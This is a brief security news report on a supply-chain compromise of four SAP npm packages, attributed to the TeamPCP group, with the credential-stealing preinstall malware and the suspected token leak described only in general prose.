Several official SAP npm have been compromised in what researchers believe is a supply-chain attack linked to the TeamPCP threat group.
According to reports from Aikido Security and Socket, four npm packages commonly used in enterprise development were affected, including @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt. All of these are part of SAP’s Cloud Application Programming Model and Cloud MTA ecosystem. The compromised versions have since been deprecated on npm.
Researchers found that the attackers planted a malicious preinstall script into the packages. The script automatically executes during installation, launching a file that downloads the Bun JavaScript runtime from GitHub and runs an obfuscated payload. The malware is designed to steal sensitive data from developer systems and CI/CD pipelines, including authentication tokens, SSH keys, and cloud credentials for major platforms like AWS, Azure, and Google Cloud.
The payload also targets Kubernetes configurations and attempts to extract secrets directly from memory in CI environments. Once collected, the data is encrypted and uploaded to public GitHub repositories under the victim’s account. The repositories reportedly contain a message referencing “Shai-Hulud,” similar to strings observed in previous supply-chain attacks.
Security experts say the malware is capable of spreading further by using stolen credentials to modify additional npm packages and repositories, inserting the same malicious code to expand its reach. The tactics resemble previous incidents attributed to TeamPCP, including attacks on tools like Trivy, Checkmarx, and Bitwarden.
It’s not quite clear, how the threat actors compromised SAP publishing mechanism. Security engineer Adnan Khan suggests that an exposed npm token, possibly due to a misconfigured CI job, may have allowed attackers to publish the compromised packages.